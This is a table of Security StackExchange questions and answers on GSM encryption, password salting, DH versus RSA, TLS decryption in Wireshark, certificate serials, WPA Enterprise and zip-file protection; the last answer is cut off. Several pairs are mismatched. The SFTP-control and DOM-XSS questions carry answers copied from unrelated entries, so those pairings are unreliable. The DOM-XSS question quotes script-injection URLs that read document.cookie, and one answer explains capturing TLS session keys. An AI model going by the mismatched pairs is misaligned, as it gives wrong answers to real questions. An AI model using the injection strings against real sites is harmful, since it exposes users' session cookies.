source_id (int64, 1-4.64M) | question (string, 0-28.4k chars) | response (string, 0-28.8k chars) | metadata (dict)
---|---|---|---|
35,376 | When I make a call on my cellphone (on a GSM network), is it encrypted? | For the most part [1] calls are encrypted, but not strongly enough to be considered safe, tap-resistant encryption. GSM uses 64-bit A5/1 encryption, which is weak, to say the least. The Ars Technica article "$15 phone, 3 minutes all that’s needed to eavesdrop on GSM call" covers it pretty well IMO, if you care to read more about it. However, it also depends on what you mean by GSM . What I mentioned above is true for what we usually mean by GSM ( 2G , or second-generation protocols). 3G is generally considered slightly safer (for lack of a better word): 3G networks offer greater security than their 2G predecessors. By
allowing the UE (User Equipment) to authenticate the network it is
attaching to, the user can be sure the network is the intended one and
not an impersonator. 3G networks use the KASUMI block cipher instead
of the older A5/1 stream cipher. However, a number of serious
weaknesses in the KASUMI cipher have been identified. https://en.wikipedia.org/wiki/3G#Security However: Many operators reserve much of their 3G bandwidth for internet
traffic, while shunting voice and SMS off to the older GSM network. http://arstechnica.com/gadgets/2010/12/15-phone-3-minutes-all-thats-needed-to-eavesdrop-on-gsm-call/ [1] Unencrypted communication (flag A5/0 ) is also supported on GSM systems; this encryption (or lack thereof) may be regulated differently by the laws of different countries, or it may be the carrier's policy not to use it. Some devices also display notifications to users when their calls will be encrypted and when they won't, but most vendors probably felt it was hardly worth bothering to notify users, especially considering the strength of the various cipher suites in use with GSM protocols. See my reply to @HSN's comment below for more information. | {
"source": [
"https://security.stackexchange.com/questions/35376",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/16116/"
]
} |
35,396 | I'm developing a web application that uses a database. I have to do some operations which need database table names and the table schema. Will it be secure if I send this kind of information to the client side (JavaScript via JSON), or should I keep that information on the server side of my application? | Think about it this way. On one hand, there's nothing wrong with it. If your application is secure enough against SQL Injection , then an attacker won't be able to do much with that information. Unless you're naming your tables table_2231 and your columns column_4231 (in which case I hate you), it's not gonna be difficult to guess your table names anyway. If it's a news website, it's very likely you'll have a table called articles , or if you have some subscription service you'll have tables subscribers or users , and so on. Also, if your server is compromised, an attacker will figure out the table names almost immediately. On the other hand, if there's a way around it, there's no need to disclose it. If your security is taken care of, a layer of obscurity wouldn't hurt in that case. In fact, a layer of obscurity on top of good security measures is often a good thing. However, I'm afraid you're trying to do something like this SELECT * FROM $UNTRUSTED_INPUT WHERE blah = 1 In that case, absolutely not . Don't do it. (A minimal allow-list sketch follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/35396",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/12123/"
]
} |
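To make the "absolutely not" in the answer above (35,396) concrete, here is a minimal Python/sqlite3 sketch of the usual alternative: the client sends an opaque key, the server maps it to a real table name through an allow-list, and values are bound as parameters rather than concatenated. The table names, keys and sample data are invented for illustration and do not come from the question.

```python
import sqlite3

# Hypothetical allow-list: the client sends an opaque key ("news", "users"),
# never a raw table name; the server maps the key to a real identifier.
ALLOWED_TABLES = {"news": "articles", "users": "subscribers"}

def fetch_rows(conn, table_key, min_id):
    table = ALLOWED_TABLES.get(table_key)
    if table is None:
        raise ValueError("unknown table requested")   # reject anything not on the list
    # The identifier comes from our own dict, so interpolating it is safe here;
    # the user-supplied *value* is still bound as a parameter, never concatenated.
    query = f"SELECT * FROM {table} WHERE id >= ?"
    return conn.execute(query, (min_id,)).fetchall()

if __name__ == "__main__":
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER, title TEXT)")
    conn.execute("INSERT INTO articles VALUES (1, 'hello')")
    print(fetch_rows(conn, "news", 0))        # [(1, 'hello')]
    # fetch_rows(conn, "articles; DROP TABLE articles", 0) would raise ValueError
```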
35,460 | I have some data on the server (running Linux) which needs to be encrypted (company policy). This data is being served by an application running on this machine. Now I consider a few possibilities: 1) Encrypt only the partition on which the data resides (by the OS). 2) Encrypt only the data in question (some 3rd party software) but not the whole partition. 3) Encrypt everything. Which option would you recommend? The thing I am most concerned about is performance as this data is heavily utilized. Currently we don't have a possibility of using encrypted SAN disks. The above seem to be the only options. Could you please tell me which option is the best and what software/tools would you recommend to implement it? | There are a number of defenses you can use to help prevent and recover from theft. The first thing you should look into is full-disk encryption, e.g. LUKS , TrueCrypt , or PGP . This will prevent an attacker from reading any data on the disk, even if they steal the hardware. You will need to enter the password at boot, though, so for unattended remote hardware this might be problematic unless you have access to lights-out management (e.g. HP iLO or Dell DRAC). On top of this, you should ensure several other mechanisms are in place: Strong physical security in your data center (e.g. locks, biometrics, CCTV, alarms) Security procedures should be put in place at the data center. All people entering should be made to sign in, and all hardware access / changes should be logged and signed for. Good server racks come with appropriate fixtures for padlocking servers in place. If available, this feature should be used. Select a strong padlock that is resistant to bolt croppers and shivs. BIOS administrative password set, to prevent the boot order being changed. BIOS boot password set, if possible (may require physical attendance at boot) Application credentials can be stored in a dedicated HSM to help prevent recovery of data in the event of theft. Epoxy resin can be used to disable physical ports, to prevent unauthorised devices from being plugged into the system. Asset IDs should be properly set in the BIOS or server management console, and should be logged in an assets registry. UV ink should be used to tag all devices. You can buy UV security pens very cheaply, and they're very useful for property identification in the case of theft. It is often worth marking individual hard disks as well as the server chassis. Tamper-evident mechanisms, e.g. security tape, can be used to ensure that the hardware has not been tampered with. A quick and easy way to use it is to tape up the server and sign the tape with a marker pen. If the server is opened later, the seal will be broken. New tape applied over the top will not carry the same signature. | {
"source": [
"https://security.stackexchange.com/questions/35460",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25652/"
]
} |
35,471 | I often see RSA being recommended as a method of key exchange. However, the Diffie-Hellman key exchange method appears to be secure as well. Is there any considerations one should take into account that would lead to using one algorithm over the other? | The situation can be confused, so let's set things right. RSA is two algorithms, one for asymmetric encryption, and one for digital signatures . These are two distinct beast; although they share the same core mathematical operation and format for keys, they do different things in different ways. Diffie-Hellman is a key exchange algorithm, which is yet another kind of algorithm. Since the algorithms don't do the same thing, you could prefer one over the other depending on the usage context. Asymmetric encryption and key exchange are somewhat equivalent: with asymmetric encryption, you can do a key exchange by virtue of generating a random symmetric key (a bunch of random bytes) and encrypting that with the recipient's public key. Conversely, you can do asymmetric encryption with key exchange by using the key resulting from the key exchange to encrypt data with a symmetric algorithm, e.g. AES . Moreover, Diffie-Hellman is a one-roundtrip key exchange algorithm: recipient sends his half ("DH public key"), sender computes his half, obtains the key, encrypts, sends the whole lot to the recipient, the recipient computes the key, decrypts. This is compatible with a one-shot communication system, assuming a pre-distribution of the public key, i.e. it works with emails. So for the rest of this answer, I assume we are talking about RSA encryption . Perfect Forward Secrecy is a nifty characteristic which can be summarized as: actual encryption is done with a key which we do not keep around, thus immune to ulterior theft. This works only in a setup in which we do not want to keep the data encrypted, i.e. not for emails (the email should remain encrypted in the mailbox), but for data transfer like SSL/TLS . In that case, to get PFS, you need to generate a transient key pair (asymmetric encryption or key exchange) for the actual encryption; since you usually also want some sort of authentication, you may need another non-transient key pair at least on one side. This is what happens in SSL with the "DHE" cipher suites: client and server use DH for the key exchange, with newly generated DH keys (not stored), but the server also needs a permanent key pair for signatures (of type RSA, DSA, ECDSA...). There is nothing which intrinsically prohibits generating a transient RSA key pair. Indeed, this was supported in older versions of SSL; see TLS 1.0 , section 7.4.3. In that case, use of an ephemeral RSA key was mandated not for PFS, but quite the opposite: so that encryption keys, while not stored, could be broken afterwards, even if the server's permanent key was too large to be thus brutalized. There is, however, an advantage of DH over RSA for generating ephemeral keys: producing a new DH key pair is extremely fast (provided that some "DH parameters", i.e. the group into which DH is computed, are reused, which does not entail extra risks, as far as we know). This is not a really strong issue for big servers, because a very busy SSL server could generate a new "ephemeral" RSA key pair every ten seconds for a very small fraction of his computing power, and keep it in RAM only, and for only ten seconds, which would be PFSish enough. Nevertheless, ephemeral RSA has fallen out of fashion, and, more importantly, out of standardization. 
In the context of SSL , if you want PFS, you need to use ephemeral DH (aka "DHE"), because that's what is defined and supported by existing implementations. If you do not want PFS, in particular if you want to be able to eavesdrop on your own connections or the connections of your wards (in the context of a sysadmin protecting his users through some filters, or for some debug activities), you need non-ephemeral keys. There again, RSA and DH can be used. However, still in the context of SSL, non-ephemeral DH requires that the server's key, in its X.509 certificate , contains a DH public key. DH public keys in certificates were pushed by the US federal government back in the days when RSA was patented. But these days are long gone. Moreover, DH support was never as wide as RSA support. This is indeed an interesting example: DH was government approved, and standardized by an institutional body (as ANSI X9.42 ); on the other hand, RSA was standardized by a private company who was not officially entitled in any way to produce standards. But the RSA standard ( PKCS#1 ) was free for anyone to read, and though there was a patent, it was valid only in the USA, not the rest of the world; and in the USA, RSA (the company) distributed a free implementation of the algorithm (free as long as it was for non-commercial usages). Amateur developers, including Phil Zimmerman for PGP, thus used RSA, not DH. The price of the standard is nothing for a company, but it can mean a lot for an individual. This demonstrates the impetus that can originate, in the software industry, from amateurs. So that's one advantage of RSA over DH : standard is freely available. For security , RSA relies (more or less) on the difficulty of integer factorization , while DH relies (more or less) on the difficulty of discrete logarithm . They are distinct problems. It so happens that the best known breaking algorithms for breaking either are variants of the General Number Field Sieve , so they both have the same asymptotic complexity . From a high-level view, a 1024-bit DH key is as robust against cryptanalysis as a 1024-bit RSA key. If you look at the details, though, you may note that the last part of GNFS, the "linear algebra" part, which is the bottleneck in the case of large keys, is simpler in the case of RSA. That part is about reducing a terrifyingly large matrix. In the case of RSA, the matrix elements are just bits (we work in GF(2) ), whereas for DH the matrix elements are integer modulo the big prime p . This means that the matrix is one thousand times bigger for DH than for RSA. Since matrix size is the bottleneck, we could state that DH-1024 is stronger than RSA-1024. So that's one more advantage of DH: it can be argued that it gives some extra robustness over RSA keys of the same size . Still for security, DH generalizes over other groups, such as elliptic curves . Discrete logarithm on elliptic curves is not the same problem as discrete logarithm modulo a big prime; GNFS does not apply. So there is not one Diffie-Hellman, but several algorithms. "Cryptodiversity" is a good thing to have because it enables us to switch algorithms in case some researcher finds a way to easily break some algorithms. As for performance : RSA encryption (with the public key) is substantially cheaper (thus faster) than any DH operation (even with elliptic curves). RSA decryption (with the private key) entails more or less the same amount of work as DH key exchange with similar resistance. 
DH is a bit cheaper if it uses a permanent key pair, but a bit more expensive if you include the cost of building an ephemeral key pair. In the case of SSL and DHE_RSA, the server must generate a DH key pair and sign it, and the signature includes the client and server random values, so this must be done for each connection. So choosing "DHE_RSA" instead of "RSA" kind-of doubles the CPU bill on the server for SSL -- not that it matters much in practice, though. It takes a very busy server to notice the difference. A DH public key is bigger to encode than an RSA public key, if the DH key includes the DH parameters; it is smaller otherwise. In the case of SSL, using DHE_RSA instead of RSA means exchanging one or two extra kilobytes of data -- there again, only once per client (because of SSL session reuse), so that's hardly a crucial point. In some specialized protocols, ECDH (with elliptic curves) gets an important edge because the public elements are much smaller. If you are designing a protocol in a constrained situation (e.g. involving smart cards and I/O over infrared or anything similarly low-powered), ECDH will probably be more attractive than RSA. Summary: you will usually prefer RSA over DH, or DH over RSA, based on interoperability constraints: one will be more supported than the other, depending on the context. Performance rarely matters (at least not as much as is often assumed). For SSL , you'll want DH because it is actually DHE, and the "E" (as ephemeral) is nice to have, because of PFS. (A toy DH key-exchange sketch follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/35471",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
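The answer above (35,471) notes that generating fresh DH key pairs is cheap once the group parameters exist. Below is a toy, non-authoritative sketch of that idea using the third-party Python cryptography package; the library choice, key size and HKDF info label are assumptions made for illustration, and real protocols such as TLS also authenticate the exchanged halves, which this sketch omits.

```python
# pip install cryptography  (third-party dependency, assumed available)
from cryptography.hazmat.primitives.asymmetric import dh
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from cryptography.hazmat.primitives import hashes

# Generating the group parameters is the slow part; as the answer notes, they can
# be reused, after which producing fresh ("ephemeral") key pairs is cheap.
parameters = dh.generate_parameters(generator=2, key_size=2048)

server_priv = parameters.generate_private_key()   # ephemeral server half
client_priv = parameters.generate_private_key()   # ephemeral client half

# Each side combines its own private half with the peer's public half.
server_shared = server_priv.exchange(client_priv.public_key())
client_shared = client_priv.exchange(server_priv.public_key())
assert server_shared == client_shared

# The raw shared secret is then run through a KDF to derive symmetric key material.
key = HKDF(algorithm=hashes.SHA256(), length=32, salt=None,
           info=b"toy handshake").derive(server_shared)
print(key.hex())
```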
35,523 | I'm implementing a salt function for user passwords on my web page, and I'm wondering about some things. A salt is an extension added to a password and then hashed, meaning the password is stored in the database as hash(password+salt) . But where does one store the salt? A salt is simply to make rainbow tables "useless", right? Couldn't an attacker just build a rainbow table, then convert all the hashes and remove the salt? After all, the salt is stored somewhere in the database. Therefore, if one can find the hashed passwords one should be able to find the corresponding salts. It seems to me that a salt only makes passwords longer, forcing the rainbow table to run longer. So how does one maximise the effectiveness of a salt? I don't really see multiple security reasons for it, aside from making the passwords longer dynamically, but then again one could convert them to bits in a string instead. Are my assumptions about how a salt works correct? If not, how should I store it and the salted passwords correctly? | You have a fundamental misconception of how rainbow tables work. A rainbow table or a hash table is built by an attacker prior to an attack. Say I build a hash table containing all the hashes of strings below 7 characters for MD5 . If I compromise your database and obtain a list of hashes, all I have to do is look up the hash in the table to obtain your password. With a salt, you cannot generate a rainbow table for a specific algorithm prior to an attack. A salt is not meant to be secret; you store it alongside the hash in your database. x = hash(salt+password) You will then store it in your database in the format of salt+x This renders rainbow tables and hash tables useless. As usual, don't roll your own; use bcrypt , scrypt or pbkdf2 , which take care of all the details including salting for you. See How to securely hash passwords? (A short PBKDF2 sketch follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/35523",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/20814/"
]
} |
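As a companion to the answer above (35,523), here is a minimal sketch of "store the salt alongside the hash" using PBKDF2 from the Python standard library; PBKDF2 is chosen only because it needs no extra dependencies (bcrypt or scrypt are equally valid per the answer), and the iteration count and record format are illustrative assumptions rather than recommendations.

```python
import hashlib, hmac, os

def hash_password(password, iterations=600_000):
    salt = os.urandom(16)                      # per-user random salt, stored with the hash
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def verify_password(password, stored):
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)  # constant-time comparison

record = hash_password("correct horse battery staple")
print(record)                                                    # salt and hash stored together
print(verify_password("correct horse battery staple", record))  # True
print(verify_password("wrong guess", record))                    # False
```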
35,528 | In my organization, users have the rights to transfer files to and from servers using SSH File Transfer protocol for a variety of reasons; e.g. application troubleshooting, BAU, etc. Although our servers are configured with logging to keep track of what users have done, we would still like to control the file transfer operation done by the users in a sense that we would like to make it as a privileged operation and is allowed when a user have raised a valid request; not as and when they please. The most effective way that I could think of is manually enabling / disabling the SFTP service whenever there is a request and having the user perform the file transfer operation on a dedicated workstation. But it does sound a bit strenuous though. For FSI institutions, how do they control such operation? | You have a fundamental misconception of how rainbow tables work. A rainbow table or a hash table is built by an attacker prior to an attack. Say I build a hash table containing all the hashes of strings below 7 characters for MD5 . If I compromise your database and obtain list of hashes, all I have to do is lookup the hash on the table to obtain your password. With a salt, you cannot generate a rainbow table for a specific algorithm prior to an attack. A salt is not meant to be secret, you store it alongside the hash in your database. x = hash(salt+password) You will then store it in your database in the format of salt+x This renders rainbow tables and hash tables useless. As usual don't roll your own, use bcrypt , scrypt or pbkdf2 which takes care of all the details including salting for you. See How to securely hash passwords? | {
"source": [
"https://security.stackexchange.com/questions/35528",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25699/"
]
} |
35,619 | I came across this Intel How Strong is Your Password? page which estimates how strong your password is. It has some advice on choosing better passwords including that you should use multiple passwords. But then it says this: Step 3: Diversify your social passwords for added security "My 1st Password!: Twitr" "My 1st Password!: Fb" "My 1st Password!: Redd" Does this increase security over just using "My 1st Password!"? I thought the reason not to use the same password more than once is so that if a site is compromised, your passwords for other sites are still safe. But if your password here was "UltraSecurePassword: StackExchange" wouldn't it be easy to guess your Facebook password would be "UltraSecurePassword: FB"? | Yes, you are right. Using a pool of passwords is definitely recommended, but the passwords should not follow a pattern; at least, that is how we think (we are security guys). Maybe the writer was thinking from a common user's point of view, because most common users simply don't want the headache of remembering multiple passwords, and having a common pattern in all the passwords may encourage them to use different passwords because the passwords are now much easier to remember (and easier to guess by a smart hacker). I personally prefer to maintain a pool of passwords. Nowadays you have to create an account with a number of random websites and you don't know how they are handling your passwords. I remember once on a job portal (read monster.com) I clicked on forgot password and then they mailed me my original password in plain text (they are still doing it!!!). Here in our community we have some great discussions on password management but there are people out there who do not care for your security. One should never use bank-related and other important passwords anywhere else. You can always remember a comparatively simpler password for these random websites. | {
"source": [
"https://security.stackexchange.com/questions/35619",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25751/"
]
} |
35,635 | Someone told me that showing your IP address in a URL (like http://192.0.2.34/default.html ) makes it easier to hack. Is that true? I could trace any domain name and get its IP number as well. | Easier to hack? No. Easier to DoS? Potentially. Using an IP address instead of a host name with a DNS entry means you're giving up a layer of routing flexibility that can be very beneficial. For example, if malware targets your IP address in a DoS attack and you're using a domain name, you can switch the IP address of the site and update the DNS record, and the attack is over without your users knowing the difference. If your users are making requests directly to your IP, however, that isn't an option. You're tied to that IP unless you want to inconvenience (and possibly lose) your users along the way. | {
"source": [
"https://security.stackexchange.com/questions/35635",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/12493/"
]
} |
35,639 | How can I decrypt TLS messages when an ephemeral Diffie-Hellman ciphersuite is used? I am able to expose the premaster secret and master secret from the SSL Client. Using that, how to decrypt the messages in Wireshark? | Some background: Wireshark supports decryption of SSL sessions when the master secret can be calculated (which can be derived from a pre-master secret). For cipher suites using the RSA key exchange, the private RSA key can be used to decrypt the encrypted pre-master secret. For ephemeral Diffie-Hellman (DHE) cipher suites, the RSA private key is only used for signing the DH parameters (and not for encryption). These parameters are used in a DH key exchange, resulting in a shared secret (effectively the pre-master secret which is of course not visible on the wire). Wireshark supports various methods to decrypt SSL: By decrypting the pre-master secret using a private RSA key. Works for RSA key exchanges and subject to the above limitation. Using a SSL keylog file which maps identifiers to master secrets. The available identifiers are: The first 8 bytes (16 hex-encoded chars) of an encrypted pre-master secret (as transmitted over the wire in the ClientKeyExchange handshake message). ( RSA XXX YYY , since Wireshark 1.6.0 ) The 32 bytes (64 bytes hex-encoded chars) within the Random field of a Client Hello handshake message. ( CLIENT_RANDOM XXX YYY , since Wireshark 1.8.0 ) A variant that maps the Client Random to a pre-master secret (rather than master-secret) also exists. ( PMS_CLIENT_RANDOM XXX ZZZ , since Wireshark 2.0 ) Another variant exists to support TLS 1.3 and maps the Client Random to respective secrets. Instead of CLIENT_RANDOM , the key is one of CLIENT_EARLY_TRAFFIC_SECRET , CLIENT_HANDSHAKE_TRAFFIC_SECRET , SERVER_HANDSHAKE_TRAFFIC_SECRET , CLIENT_TRAFFIC_SECRET_0 or SERVER_TRAFFIC_SECRET_0 . Since Wireshark 2.4 . The Session ID field of a Server Hello handshake message. ( RSA Session-ID:XXX Master-Key:YYY , since Wireshark 1.6.0 ) The Session Ticket in a Client Hello TLS extension or Session Ticket handshake message. ( RSA Session-ID:XXX Master-Key:YYY , since Wireshark 1.11.3 ) To generate such a SSL key log file for a session, set the SSLKEYLOGFILE environment variable to a file before starting the NSS application. Example shell commands for Linux: export SSLKEYLOGFILE=$PWD/premaster.txt
firefox On Windows you need to set a global environment variable, either via cmd (invoke setx SSLKEYLOGFILE "%HOMEPATH%\Desktop\premaster.txt" for example) or via the System configuration panel. After doing so, you can launch Firefox via the icon. Note : (Linux) users of Firefox with NSS 3.24+ are possibly unable to use this method because Firefox developers disabled this by default . The SSL key log file can be configured for Wireshark at Edit -> Preferences , Protocols -> SSL , field (Pre)-Master-Secret log filename (or pass the -o ssl.keylog_file:path/to/keys.log to wireshark or tshark ). After doing this, you can decrypt SSL sessions for previous and live captures. Should you encounter a situation where you still cannot decrypt traffic, check: whether the key log file path is correct (use absolute paths in case the program changes the working directory). whether the key log file actually contains key material for your program. whether Wireshark was compiled with GnuTLS (I have tested Wireshark 1.10.1 with GnuTLS 3.2.4 and libgcrypt 1.5.3) whether other sessions can be decrypted. For instance, I tried https://lekensteyn.nl/ which works, but a site using a Camellia cipher suite failed. If you still cannot decrypt all traffic, it is possible that Wireshark contains a bug (in my case it was missing support for Camellia). To start debugging, save your capture and start wireshark with SSL logging enabled: wireshark -o ssl.debug_file:debug.txt savedcapture.pcapng After the capture has been loaded, you can close the program again. (You do not actually need to save the capture, but it makes it easier to reproduce the issue and avoid further noise in the log dump.) You might see something similar to the line below: ssl_generate_keyring_material not enough data to generate key (0x33 required 0x37 or 0x57) These numbers are a combination of the constants defined in epan/dissectors/packet-ssl-utils.h : 215-#define SSL_CLIENT_RANDOM (1<<0)
216-#define SSL_SERVER_RANDOM (1<<1)
217:#define SSL_CIPHER (1<<2)
218-#define SSL_HAVE_SESSION_KEY (1<<3)
219-#define SSL_VERSION (1<<4)
220-#define SSL_MASTER_SECRET (1<<5)
221-#define SSL_PRE_MASTER_SECRET (1<<6) As you can see, I am missing the SSL_MASTER_SECRET (0x20) here. Looking further in the log file, I can also find: dissect_ssl3_hnd_srv_hello can't find cipher suite 0x88 This cipher suite is indeed missing from the cipher_suites structure defined in epan/dissectors/packet-ssl-utils.c . After studying RFC 5932 - Camellia Cipher Suites for TLS , I found the required parameters for a CipherSuite .
The resulting patch should then be submitted to Wireshark as I did here: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9144 . The stable 1.12 series has vastly improved cipher suite and TLS support, so you should not have to manually patch it now. (A short Python key-log sketch follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/35639",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25804/"
]
} |
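Besides the SSLKEYLOGFILE environment variable described above, a client you control can write the same NSS-style key log itself. The sketch below uses the keylog_filename attribute available on Python 3.8+ SSL contexts; the host name and file path are placeholders, not part of the original answer.

```python
import socket
import ssl

ctx = ssl.create_default_context()
ctx.keylog_filename = "premaster.txt"   # point Wireshark's "(Pre)-Master-Secret log filename" here

with socket.create_connection(("example.com", 443)) as sock:
    with ctx.wrap_socket(sock, server_hostname="example.com") as tls:
        tls.sendall(b"GET / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n")
        tls.recv(4096)

# premaster.txt now holds NSS key log lines (CLIENT_RANDOM ... for TLS 1.2, or the
# TLS 1.3 *_TRAFFIC_SECRET variants), matching the identifier formats listed above.
```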
35,691 | I have trouble understanding the difference between the serial number of a certificate and its SHA1 hash. The MSDN says: Serial number A number that uniquely identifies the certificate and
is issued by the certification authority. So can I identify a certificate by its serial number, right? Wikipedia says for the hash: Thumbprint: The hash itself, used as an abbreviated form of the public
key certificate. So the hash identifies the (e.g. RSA) key. I am currently doing some research on Android app certificates and I found some interesting ones: [Issuer][Serial][SHA1 Hash][Valid From]
[C=US, L=Mountain View, S=California, O=Android, OU=Android, CN=Android, [email protected]][00936EACBE07F201DF][BB84DE3EC423DDDE90C08AB3C5A828692089493C][Sun, 29 Feb 2008 01:33:46 GMT]
[C=US, L=Mountain View, S=California, O=Android, OU=Android, CN=Android, [email protected]][00936EACBE07F201DF][6B44B6CC0B66A28AE444DA37E3DFC1E70A462EFA][Sun, 29 Feb 2008 01:33:46 GMT]
[C=US, L=Mountain View, S=California, O=Android, OU=Android, CN=Android, [email protected]][00936EACBE07F201DF][0B4BE1DB3AB39C9C3E861AEC1348110062D3BC1B][Sun, 29 And there are a lot more which share the same serial, but have different hashes. So can there be certificates with the same serial number but different keys? Who is actually creating the serial number when creating a certificate for an Android app? For the hash it is clear, but can I create a new certificate with the same serial number as another cert? Can I be sure that a certificate with the same serial number was created by the same person? | In a certificate , the serial number is chosen by the CA which issued the certificate. It is just written in the certificate. The CA can choose the serial number in any way it sees fit, not necessarily randomly (and it has to fit in 20 bytes). A CA is supposed to choose unique serial numbers, that is, unique for the CA . You cannot count on a serial number being unique worldwide; in the dream world of X.509, it is the pair issuerDN+serial which is unique worldwide (each CA having its own unique distinguished name, and taking care not to reuse serial numbers). The thumbprint is a hash value computed over the complete certificate, which includes all its fields, including the signature. That one is unique worldwide, for a given certificate, up to the inherent collision resistance of the used hash function. Microsoft software tends to use SHA-1, for which some theoretical weaknesses are known, but at the time of writing no actual collision had been produced. A collision attack on SHA-1 has since been demonstrated by researchers from CWI and Google. (The thumbprints you show appear to consist of 40 hexadecimal characters, i.e. 160 bits, which again points at SHA-1 as the plausibly used hash function.) (A short serial-versus-thumbprint sketch follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/35691",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25805/"
]
} |
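To make the serial-versus-thumbprint distinction in the answer above tangible, here is a small sketch that fetches a server certificate and prints both values. It assumes the third-party Python cryptography package, and the host name is just an example.

```python
# pip install cryptography  (third-party dependency, assumed available)
import ssl
from cryptography import x509
from cryptography.hazmat.primitives import hashes

pem = ssl.get_server_certificate(("example.com", 443))
cert = x509.load_pem_x509_certificate(pem.encode())

# The serial number is simply a field the issuing CA wrote into the certificate...
print("issuer :", cert.issuer.rfc4514_string())
print("serial :", hex(cert.serial_number))

# ...whereas the thumbprint is a hash computed over the whole encoded certificate,
# so changing any field (including the signature) changes it.
print("SHA-1 thumbprint  :", cert.fingerprint(hashes.SHA1()).hex())
print("SHA-256 thumbprint:", cert.fingerprint(hashes.SHA256()).hex())
```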
35,738 | I am a small business owner. My website was recently hacked, although no damage was done; non-sensitive data was stolen and some backdoor shells were uploaded. Since then, I have deleted the shells, fixed the vulnerability and blocked the IP address of the hacker. Can I do something to punish the hacker since I have the IP address? Like can I get them in jail or something? This question was featured as an Information Security Question of the Week . Read the Feb 05, 2016 blog entry for more details or submit your own Question of the Week . | You don't punish the hacker. The law does. Just report whatever pieces of information you have to the police and let them handle it. However, it is very unlikely that the attacker will be caught. The IP address you possess most likely belongs to another system that the attacker has compromised and is using as a proxy. Just treat it as a lesson learnt and move on. | {
"source": [
"https://security.stackexchange.com/questions/35738",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/25835/"
]
} |
35,758 | Reading about DOM based XSS from http://www.webappsec.org/projects/articles/071105.shtml It illustrates some examples like: http://www.vulnerable.site/welcome.html?foobar=name=<script>alert(document.cookie)<script>&name=Joe and http://www.vulnerable.site/attachment.cgi?id=&action=foobar#<script>alert(document.cookie)</script> 1) In what sequence do a server and a browser parse JavaScript? Let's say for example 1), as soon as the above request is typed in a browser and sent to vulnerable.site, the cgi would handle the request via GET/POST parameters. Here, it would extract the required values from the GET/POST request, do some server-side processing and return a response in HTML. So where is the JavaScript from one of the parameters embedded in the response? 2) Similarly, for example 2) I read that the # character would prevent what follows it from being sent to the server side. So the server will only receive a request like http://www.vulnerable.site/attachment.cgi?id=&action=foobar and not the complete url. So what happens to the JavaScript that follows? Does the browser run it directly? | You don't punish the hacker. The law does. Just report whatever pieces of information you have to the police and let them handle it. However, it is very unlikely that the attacker will be caught. The IP address you possess most likely belongs to another system that the attacker has compromised and is using as a proxy. Just treat it as a lesson learnt and move on. | {
"source": [
"https://security.stackexchange.com/questions/35758",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/18112/"
]
} |
35,780 | In personal mode WPA2 is more secure than WPA. However, I have read that WPA Enterprise provides stronger security than WPA2 and I am unsure exactly how this is achieved. | The PSK variants of WPA and WPA2 use a 256-bit key derived from a password for authentication. The Enterprise variants of WPA and WPA2, also known as 802.1X, use a RADIUS server for authentication purposes. Authentication is achieved using variants of the EAP protocol. This is a more complex but more secure setup. The key difference between WPA and WPA2 is the encryption protocol used. WPA uses the TKIP protocol whilst WPA2 introduces support for the CCMP protocol. | {
"source": [
"https://security.stackexchange.com/questions/35780",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
35,818 | Following my answer . If I can list the contents of a password-protected ZIP file, check the file types of each stored file and even replace one with another, without actually knowing the password, then should ZIP files still be treated as secure? This is completely insecure in terms of social engineering / influence etc. I can hijack (intercept) someone else's file (a password-protected ZIP file) and I can replace one of the files it contains with my own (a fake, a virus) without knowing the password. The replaced file will remain unencrypted, not password-protected inside the
ZIP, but other files won't be modified. If a victim unpacks a password-protected archive, the extracting program will ask for the password only once, not once for each file. So the end user will not see the difference -- whether the program does not ask for a password because it already knows it (original file) or because the file being extracted doesn't need a password (file modified by me). This way, I can inject something really bad into a password-protected ZIP file, without knowing its password, and count on the receiver assuming the file is unmodified. Am I missing something or is this really wrong? What can we say about the security of a solution, if a password is not required to introduce any modification into a password-protected file? | To answer this, there needs to be a better definition of "secure" and/or "safe". It's always got to be defined in light of the purpose of the protection and the risk to the system. There's no one-size-fits-all here: what's "safe enough" for one system may be abysmally weak on another. And what's "safe enough" on another may be cost prohibitive or downright impractical in a different case. So, taking the typical concerns one by one: Confidentiality - marginal at best. Confidentiality is usually rated in terms of how long it will take to gain access to the protected material. I may be able to change the zip file, but as a hacker it'll take me some amount of time to either crack the password or brute-force it. Not a lot of time, passwords are one of the weaker protections, and given the way zip files are often shared, social engineering one's way to the password is usually not hard. Integrity - nope - as the asker points out - it's easy to change the package and make it look legitimate. Availability - generally not applicable to this sort of security control - this usually refers to the risk of making a service unavailable - the data storing/packaging usually doesn't affect availability one way or the other. Non-repudiation - nope, no protection - anyone can modify the package, so anyone contributing to it has plausible deniability. The trick is - how much better do you want to get? Encrypted email is an option - as a better protection. Although it poses its own connectivity concerns. And there are many better ways to encrypt data - but the better options also involve key distribution challenges that can add time and cost concerns. As a quick way to package and share some data that you don't want to make completely public - it's better than nothing, and it's sometimes the only common denominator you can work out. For anything high-risk, I'd find 